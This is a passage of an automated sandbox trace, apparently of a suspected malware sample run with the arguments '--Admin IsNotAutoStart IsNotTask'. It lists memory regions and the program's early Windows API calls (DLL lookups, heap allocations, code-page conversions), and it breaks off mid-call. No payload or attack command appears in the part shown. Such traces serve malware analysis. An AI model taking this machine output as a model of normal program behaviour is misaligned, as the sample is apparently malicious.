"c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1168 start_va = 0x29d0000 end_va = 0x29f5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 1169 start_va = 0x28a0000 end_va = 0x28a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028a0000" filename = "" Region: id = 1170 start_va = 0x2e60000 end_va = 0x2f60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e60000" filename = "" Region: id = 1171 start_va = 0x2e60000 end_va = 0x2f60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e60000" filename = "" Region: id = 1172 start_va = 0x2e60000 end_va = 0x2f60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e60000" filename = "" Region: id = 1173 start_va = 0x2740000 end_va = 0x2743fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1174 start_va = 0x2a00000 end_va = 0x2a2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000015.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db") Region: id = 1175 start_va = 0x28b0000 end_va = 0x28b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1176 start_va = 0x2e60000 end_va = 0x2ec5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1177 start_va = 0xf3b0000 end_va = 0xf4b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3b0000" filename = "" Region: id = 1178 start_va = 0xf3b0000 end_va = 0xf4b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3b0000" filename = "" Region: id = 1179 start_va = 0xf3b0000 end_va = 0xf4b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3b0000" filename = "" Region: id = 1180 start_va = 0xf3b0000 end_va = 0xf4b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3b0000" filename = "" Region: id = 1181 start_va = 0x759d0000 end_va = 0x75b6cfff monitored = 0 entry_point = 0x759d17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 1182 start_va = 0x758a0000 end_va = 0x758c6fff monitored = 0 entry_point = 0x758a58b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1183 start_va = 0x75b70000 end_va = 0x75b81fff monitored = 0 entry_point = 0x75b71441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 1184 start_va = 0x2a30000 end_va = 0x2a3cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui") Region: id = 1185 start_va = 0xf3b0000 end_va = 0xf4b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3b0000" filename = "" Region: id = 1186 start_va = 0xf3b0000 end_va = 0xf4b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3b0000" filename = "" Region: id = 1187 start_va = 0xf3b0000 end_va = 0xf4b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3b0000" filename = "" Region: id = 1188 start_va = 0xf3b0000 end_va = 0xf4b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3b0000" filename = "" Region: id = 1189 start_va = 0x737e0000 end_va = 0x7382bfff monitored = 0 entry_point = 0x737e2c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1190 start_va = 0x71df0000 end_va = 0x71e1dfff monitored = 0 entry_point = 0x71df1bba region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\SysWOW64\\shdocvw.dll" (normalized: "c:\\windows\\syswow64\\shdocvw.dll") Region: id = 1191 start_va = 0x2ed0000 end_va = 0x2eddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 1192 start_va = 0x2ee0000 end_va = 0x2f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ee0000" filename = "" Region: id = 1193 start_va = 0xf3b0000 end_va = 0xf4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f3b0000" filename = "" Region: id = 1194 start_va = 0x7ef9b000 end_va = 0x7ef9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 1252 start_va = 0x739b0000 end_va = 0x739c2fff monitored = 0 entry_point = 0x739b1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1253 start_va = 0x610000 end_va = 0x610fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mpr.dll.mui") Region: id = 1254 start_va = 0x2820000 end_va = 0x285ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002820000" filename = "" Region: id = 1255 start_va = 0x2860000 end_va = 0x289ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 1256 start_va = 0x2fb0000 end_va = 0x30affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fb0000" filename = "" Region: id = 1257 start_va = 0x30b0000 end_va = 0x31affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030b0000" filename = "" Region: id = 1258 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 1259 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 1260 start_va = 0x74920000 end_va = 0x74927fff monitored = 0 entry_point = 0x74921356 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\SysWOW64\\drprov.dll" (normalized: "c:\\windows\\syswow64\\drprov.dll") Region: id = 1261 start_va = 0x73350000 end_va = 0x73378fff monitored = 0 entry_point = 0x73356b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 1262 start_va = 0x71e00000 end_va = 0x71e13fff monitored = 0 entry_point = 0x71e015c9 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\SysWOW64\\ntlanman.dll" (normalized: "c:\\windows\\syswow64\\ntlanman.dll") Region: id = 1263 start_va = 0x71de0000 end_va = 0x71df6fff monitored = 0 entry_point = 0x71de1549 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 1264 start_va = 0x71dd0000 end_va = 0x71dd7fff monitored = 0 entry_point = 0x71dd3c87 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 1265 start_va = 0x71dc0000 end_va = 0x71dcefff monitored = 0 entry_point = 0x71dc12a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 1266 start_va = 0x71db0000 end_va = 0x71dbafff monitored = 0 entry_point = 0x71db1200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 1267 start_va = 0x71da0000 end_va = 0x71da8fff monitored = 0 entry_point = 0x71da15a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 1268 start_va = 0x71d90000 end_va = 0x71d9cfff monitored = 0 entry_point = 0x71d912d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 1381 start_va = 0x31b0000 end_va = 0x336ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031b0000" filename = "" Region: id = 1382 start_va = 0x3370000 end_va = 0x3c9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1383 start_va = 0x31b0000 end_va = 0x322ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031b0000" filename = "" Region: id = 1384 start_va = 0x3330000 end_va = 0x336ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Thread: id = 63 os_tid = 0xee8 [0102.044] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0xa3dd49c0, dwHighDateTime=0x1d8a8d3)) [0102.044] GetCurrentThreadId () returned 0xee8 [0102.044] GetCurrentProcessId () returned 0xee4 [0102.044] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=2076117378214) returned 1 [0102.073] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x76f1fd35, hStdError=0x76f87daf)) [0102.098] GetProcessHeap () returned 0x2a0000 [0102.238] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x752b0000 [0102.238] GetProcAddress (hModule=0x752b0000, lpProcName="FlsAlloc") returned 0x752c4ee3 [0102.238] GetProcAddress (hModule=0x752b0000, lpProcName="FlsFree") returned 0x752c354f [0102.238] GetProcAddress (hModule=0x752b0000, lpProcName="FlsGetValue") returned 0x752c1252 [0102.239] GetProcAddress (hModule=0x752b0000, lpProcName="FlsSetValue") returned 0x752c41c0 [0102.239] GetProcAddress (hModule=0x752b0000, lpProcName="InitializeCriticalSectionEx") returned 0x752c4ce0 [0102.239] GetProcAddress (hModule=0x752b0000, lpProcName="CreateEventExW") returned 0x753446ab [0102.239] GetProcAddress (hModule=0x752b0000, lpProcName="CreateSemaphoreExW") returned 0x75344735 [0102.239] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadStackGuarantee") returned 0x752cd2d7 [0102.239] GetProcAddress (hModule=0x752b0000, lpProcName="CreateThreadpoolTimer") returned 0x752dee4e [0102.239] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadpoolTimer") returned 0x76f4441c [0102.239] GetProcAddress (hModule=0x752b0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x76f6c50e [0102.239] GetProcAddress (hModule=0x752b0000, lpProcName="CloseThreadpoolTimer") returned 0x76f6c381 [0102.240] GetProcAddress (hModule=0x752b0000, lpProcName="CreateThreadpoolWait") returned 0x752df058 [0102.240] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadpoolWait") returned 0x76f505d7 [0102.240] GetProcAddress (hModule=0x752b0000, lpProcName="CloseThreadpoolWait") returned 0x76f6ca24 [0102.240] GetProcAddress (hModule=0x752b0000, lpProcName="FlushProcessWriteBuffers") returned 0x76f20b8c [0102.240] GetProcAddress (hModule=0x752b0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x76fdfde8 [0102.240] GetProcAddress (hModule=0x752b0000, lpProcName="GetCurrentProcessorNumber") returned 0x76f71e1d [0102.240] GetProcAddress (hModule=0x752b0000, lpProcName="GetLogicalProcessorInformation") returned 0x75344d01 [0102.240] GetProcAddress (hModule=0x752b0000, lpProcName="CreateSymbolicLinkW") returned 0x7533d181 [0102.240] GetProcAddress (hModule=0x752b0000, lpProcName="SetDefaultDllDirectories") returned 0x753d208a [0102.241] GetProcAddress (hModule=0x752b0000, lpProcName="EnumSystemLocalesEx") returned 0x753447ef [0102.241] GetProcAddress (hModule=0x752b0000, lpProcName="CompareStringEx") returned 0x75344c51 [0102.241] GetProcAddress (hModule=0x752b0000, lpProcName="GetDateFormatEx") returned 0x75356c26 [0102.241] GetProcAddress (hModule=0x752b0000, lpProcName="GetLocaleInfoEx") returned 0x75344cf1 [0102.241] GetProcAddress (hModule=0x752b0000, lpProcName="GetTimeFormatEx") returned 0x75356ba1 [0102.241] GetProcAddress (hModule=0x752b0000, lpProcName="GetUserDefaultLocaleName") returned 0x75344d61 [0102.241] GetProcAddress (hModule=0x752b0000, lpProcName="IsValidLocaleName") returned 0x75344d81 [0102.241] GetProcAddress (hModule=0x752b0000, lpProcName="LCMapStringEx") returned 0x75344d91 [0102.241] GetProcAddress (hModule=0x752b0000, lpProcName="GetCurrentPackageId") returned 0x0 [0102.242] GetProcAddress (hModule=0x752b0000, lpProcName="GetTickCount64") returned 0x752deeb0 [0102.242] GetProcAddress (hModule=0x752b0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0102.242] GetProcAddress (hModule=0x752b0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0102.243] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3bc) returned 0x2bf228 [0102.243] GetCurrentThreadId () returned 0xee8 [0102.271] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x18) returned 0x2b1a00 [0102.271] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x800) returned 0x2bf5f0 [0102.271] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0xc038c4e6, hStdError=0x0)) [0102.271] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0102.271] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0102.271] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0102.271] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --Admin IsNotAutoStart IsNotTask" [0102.271] GetEnvironmentStringsW () returned 0x2bfdf8* [0102.272] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xb0e) returned 0x2c0910 [0102.296] FreeEnvironmentStringsW (penv=0x2bfdf8) returned 1 [0102.316] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe")) returned 0x5f [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x116) returned 0x2bfdf8 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x98) returned 0x2bff18 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3e) returned 0x2b2448 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x56) returned 0x2bffb8 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x6e) returned 0x2c0018 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x78) returned 0x2afb98 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x62) returned 0x2c0090 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x30) returned 0x2bb2d8 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x48) returned 0x2b6df0 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x28) returned 0x2bacd0 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1a) returned 0x2beae0 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x34) returned 0x2b1a20 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x5c) returned 0x2c0100 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x32) returned 0x2c0168 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2e) returned 0x2bb310 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1c) returned 0x2beb08 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x12a) returned 0x2c01a8 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x7c) returned 0x2c02e0 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x36) returned 0x2c0368 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3a) returned 0x2b2490 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x90) returned 0x2c03a8 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x24) returned 0x2bad00 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x30) returned 0x2bb348 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x36) returned 0x2c0440 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x48) returned 0x2b6e40 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x52) returned 0x2c0480 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3c) returned 0x2b24d8 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xd6) returned 0x2c04e0 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2e) returned 0x2bb380 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1e) returned 0x2beb30 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2c) returned 0x2bb3b8 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x54) returned 0x2c05c0 [0102.317] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x52) returned 0x2c0620 [0102.318] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2c) returned 0x2bb3f0 [0102.318] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x26) returned 0x2bad30 [0102.318] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3e) returned 0x2b2520 [0102.318] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x24) returned 0x2bad60 [0102.318] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x30) returned 0x2bb428 [0102.318] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x8c) returned 0x2c0680 [0102.318] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2c0910 | out: hHeap=0x2a0000) returned 1 [0102.386] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x800) returned 0x2c0718 [0102.412] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x80) returned 0x2c0f20 [0102.412] GetLastError () returned 0x0 [0102.413] SetLastError (dwErrCode=0x0) [0102.413] GetLastError () returned 0x0 [0102.413] SetLastError (dwErrCode=0x0) [0102.413] GetLastError () returned 0x0 [0102.413] SetLastError (dwErrCode=0x0) [0102.413] GetACP () returned 0x4e4 [0102.413] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x220) returned 0x2c0fa8 [0102.413] GetLastError () returned 0x0 [0102.413] SetLastError (dwErrCode=0x0) [0102.413] IsValidCodePage (CodePage=0x4e4) returned 1 [0102.413] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0102.438] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0102.448] GetLastError () returned 0x0 [0102.448] SetLastError (dwErrCode=0x0) [0102.448] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0102.461] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0102.461] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0102.461] GetLastError () returned 0x0 [0102.461] SetLastError (dwErrCode=0x0) [0102.461] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0102.461] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0102.472] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0102.472] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0102.472] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" 